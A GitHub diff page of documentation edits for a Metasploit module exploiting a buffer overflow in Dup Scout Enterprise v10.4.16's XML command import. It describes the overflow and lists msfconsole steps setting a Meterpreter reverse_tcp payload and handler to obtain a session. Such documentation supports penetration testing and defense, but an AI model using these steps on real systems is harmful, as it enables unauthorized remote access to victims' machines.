You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: documentation/modules/exploit/windows/fileformat/dupscout_xml.md
+21-20Lines changed: 21 additions & 20 deletions
Display the source diff
Display the rich diff
Original file line number
Diff line number
Diff line change
@@ -1,24 +1,8 @@
1
-
## Overview
1
+
## Description
2
2
3
3
This module exploits a buffer overflow in libpal.dll that is used by [Dup Scout Enterprise v10.4.16](http://www.dupscout.com/setups/dupscoutent_setup_v10.4.16.exe). The buffer overflow occurs during a call to the SCA_XmlParser::GetToken function when a user-supplied Command file with a crafted name attribute is imported to the Dup Scout application. The SCA_XmlParser::GetToken function is passed a heap pointer as an argument, which was created by the SCA_XmlParser::LoadXmlFile function and contains data from the user-supplied Command file, and a pointer to a stack buffer that was created in the SCA_XmlParser::ParseXmlElement function. While parsing the name attribute, the SCA_XmlParser::GetToken function copies from the heap buffer to the stack buffer until a single quote (to match name=', or a double quote to match name=") is found or until it finishes reading from the allocated heap buffer.
4
4
5
-
## Verification Steps
6
-
7
-
-[ ] Install Dup Scout Enterprise on target system
8
-
-[ ]`./msfconsole`
9
-
-[ ]`use exploit/windows/fileformat/dupscout_xml`
10
-
-[ ]`set payload windows/meterpreter/reverse_tcp`
11
-
-[ ]`set lhost <lhost>`
12
-
-[ ]`run`
13
-
-[ ]`use exploit/multi/handler`
14
-
-[ ]`set payload windows/meterpreter/reverse_tcp`
15
-
-[ ]`set lhost <lhost>`
16
-
-[ ]`run`
17
-
-[ ] From the DupScout Enterprise menu select Command -> Import Command
18
-
-[ ] Select file generated by metasploit
19
-
-[ ] Get a session
20
-
21
-
## Exploiting the Vulnerability
5
+
## Vulnerable Application
22
6
23
7
The vulnerability can be exploited when the size of the name attribute is greater than 1560 bytes.
24
8
@@ -41,9 +25,26 @@ buf << payload # Location that is jumped to
41
25
42
26
Note: The last make_nops will offset the location of the payload. The offset is included to account for writes to the stack buffer that after the user-supplied Command file has been processed.
43
27
44
-
## Example Execution
28
+
## Verification Steps
29
+
30
+
-[ ] Install Dup Scout Enterprise on target system
31
+
-[ ]`./msfconsole`
32
+
-[ ]`use exploit/windows/fileformat/dupscout_xml`
33
+
-[ ]`set payload windows/meterpreter/reverse_tcp`
34
+
-[ ]`set lhost <lhost>`
35
+
-[ ]`run`
36
+
-[ ]`use exploit/multi/handler`
37
+
-[ ]`set payload windows/meterpreter/reverse_tcp`
38
+
-[ ]`set lhost <lhost>`
39
+
-[ ]`run`
40
+
-[ ] From the DupScout Enterprise menu select Command -> Import Command
41
+
-[ ] Select file generated by metasploit
42
+
-[ ] Get a session
43
+
44
+
45
+
## Scenarios
45
46
46
-
This exploit was tested on Windows 7 SP1 x64.
47
+
### Dup Scout Enterprise v10.4.16 Windows 7 SP1 x64.
47
48
48
49
```
49
50
msf5 > use exploit/windows/fileformat/dupscout_xml
0 commit comments